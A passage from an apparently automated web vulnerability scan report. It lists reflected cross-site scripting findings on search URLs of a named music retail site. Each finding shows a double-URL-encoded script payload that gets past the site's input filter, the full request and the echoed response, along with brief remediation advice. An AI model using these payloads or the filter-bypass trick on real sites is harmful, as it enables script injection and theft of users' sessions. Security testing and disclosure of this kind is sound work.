Set-Cookie: PHPSESSID=vt7uf0qrc9nfq1nr5qb3b1rju6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=470494864; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=88003662; expires=Sun, 09-Jan-2011 02:38:26 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathan Micheled64e"><script>alert(1)</script>091edb0f64d" />
...[SNIP]...

1.203. http://www.insound.com/search/query/Nathaniel%20Rateliff%20&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathaniel%20Rateliff%20&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 28cc4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1307becdcb7 was submitted in the REST URL parameter 3. This input was echoed as 28cc4</title><script>alert(1)</script>1307becdcb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathaniel%20Rateliff%2028cc4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1307becdcb7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=v4vbvmtcknb2ulkbdsg7f0qqv0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=334838968; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=440887943; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nathaniel Rateliff 28cc4</title><script>alert(1)</script>1307becdcb7</title>
...[SNIP]...

1.204. http://www.insound.com/search/query/Nathaniel%20Rateliff%20&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nathaniel%20Rateliff%20&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0b63a131d17 was submitted in the REST URL parameter 3. This input was echoed as 84e47"><script>alert(1)</script>0b63a131d17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nathaniel%20Rateliff%2084e47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0b63a131d17&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=c6dduf7ubdfjct086eh4lht050; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=443804040; expires=Sun, 09-Jan-2011 02:38:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=104156110; expires=Sun, 09-Jan-2011 02:38:23 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nathaniel Rateliff 84e47"><script>alert(1)</script>0b63a131d17" />
...[SNIP]...

1.205. http://www.insound.com/search/query/Nation%20of%20Ulysses&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nation%20of%20Ulysses&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b7e20%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3058b1d6de was submitted in the REST URL parameter 3. This input was echoed as b7e20</title><script>alert(1)</script>a3058b1d6de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nation%20of%20Ulyssesb7e20%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3058b1d6de&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vcgvq4a9uh7m1d83q60a0hlm11; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:34 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=89437443; expires=Sun, 09-Jan-2011 02:38:34 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=408093129; expires=Sun, 09-Jan-2011 02:38:34 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nation of Ulyssesb7e20</title><script>alert(1)</script>a3058b1d6de</title>
...[SNIP]...

1.206. http://www.insound.com/search/query/Nation%20of%20Ulysses&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nation%20of%20Ulysses&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9e0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87da78ad881 was submitted in the REST URL parameter 3. This input was echoed as d9e0a"><script>alert(1)</script>87da78ad881 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nation%20of%20Ulyssesd9e0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87da78ad881&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=6mq9r5r48hgk366c8jiuiqj7b5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=272835791; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=388604899; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nation of Ulyssesd9e0a"><script>alert(1)</script>87da78ad881" />
...[SNIP]...

1.207. http://www.insound.com/search/query/National%20Eye&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/National%20Eye&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6686dec5e6 was submitted in the REST URL parameter 3. This input was echoed as 8c3e9"><script>alert(1)</script>6686dec5e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/National%20Eye8c3e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6686dec5e6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=o52d3sebfl3au5upf58b1s9j73; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=392380351; expires=Sun, 09-Jan-2011 02:38:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=343064794; expires=Sun, 09-Jan-2011 02:38:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="National Eye8c3e9"><script>alert(1)</script>6686dec5e6" />
...[SNIP]...

1.208. http://www.insound.com/search/query/National%20Eye&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/National%20Eye&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 32d97%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f1dbac9e14 was submitted in the REST URL parameter 3. This input was echoed as 32d97</title><script>alert(1)</script>3f1dbac9e14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/National%20Eye32d97%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f1dbac9e14&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=frddajcp8urpalofd7gqn4d335; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=48634354; expires=Sun, 09-Jan-2011 02:38:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=205296198; expires=Sun, 09-Jan-2011 02:38:42 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>National Eye32d97</title><script>alert(1)</script>3f1dbac9e14</title>
...[SNIP]...

1.209. http://www.insound.com/search/query/National%20Skyline&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/National%20Skyline&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e69e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ad75e72550 was submitted in the REST URL parameter 3. This input was echoed as 4e69e"><script>alert(1)</script>9ad75e72550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/National%20Skyline4e69e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ad75e72550&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ttav72ulh9276n42m108tkf1c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=62124800; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=445664358; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="National Skyline4e69e"><script>alert(1)</script>9ad75e72550" />
...[SNIP]...

1.210. http://www.insound.com/search/query/National%20Skyline&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/National%20Skyline&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b5e53%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee040bd8f7c8 was submitted in the REST URL parameter 3. This input was echoed as b5e53</title><script>alert(1)</script>e040bd8f7c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/National%20Skylineb5e53%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee040bd8f7c8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=lmmqjurphc9mcddli0uo5mp5a5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=365740917; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=216838963; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>National Skylineb5e53</title><script>alert(1)</script>e040bd8f7c8</title>
...[SNIP]...

1.211. http://www.insound.com/search/query/Nationale%20Blue&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nationale%20Blue&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 99a69%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eccbe7d5e415 was submitted in the REST URL parameter 3. This input was echoed as 99a69</title><script>alert(1)</script>ccbe7d5e415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nationale%20Blue99a69%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eccbe7d5e415&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=pfidoh165fcpdq5ravhs7h6h80; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=15049276; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=188383749; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nationale Blue99a69</title><script>alert(1)</script>ccbe7d5e415</title>
...[SNIP]...

1.212. http://www.insound.com/search/query/Nationale%20Blue&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nationale%20Blue&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27054%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3047c3c357f was submitted in the REST URL parameter 3. This input was echoed as 27054"><script>alert(1)</script>3047c3c357f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nationale%20Blue27054%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3047c3c357f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2fvhukqi31fm1qn0qh77t1iit7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=8846503; expires=Sun, 09-Jan-2011 02:38:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=567727028; expires=Sun, 09-Jan-2011 02:38:38 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nationale Blue27054"><script>alert(1)</script>3047c3c357f" />
...[SNIP]...

1.213. http://www.insound.com/search/query/Nations%20by%20the%20River&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nations%20by%20the%20River&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 247ad%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50d1ed31388 was submitted in the REST URL parameter 3. This input was echoed as 247ad</title><script>alert(1)</script>50d1ed31388 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nations%20by%20the%20River247ad%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50d1ed31388&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=tc2hfv7adief3atm22vde7ldk4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=166038235; expires=Sun, 09-Jan-2011 02:38:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=401128642; expires=Sun, 09-Jan-2011 02:38:48 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nations by the River247ad</title><script>alert(1)</script>50d1ed31388</title>
...[SNIP]...

1.214. http://www.insound.com/search/query/Nations%20by%20the%20River&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nations%20by%20the%20River&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3f0d5ee781 was submitted in the REST URL parameter 3. This input was echoed as b4bc8"><script>alert(1)</script>c3f0d5ee781 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

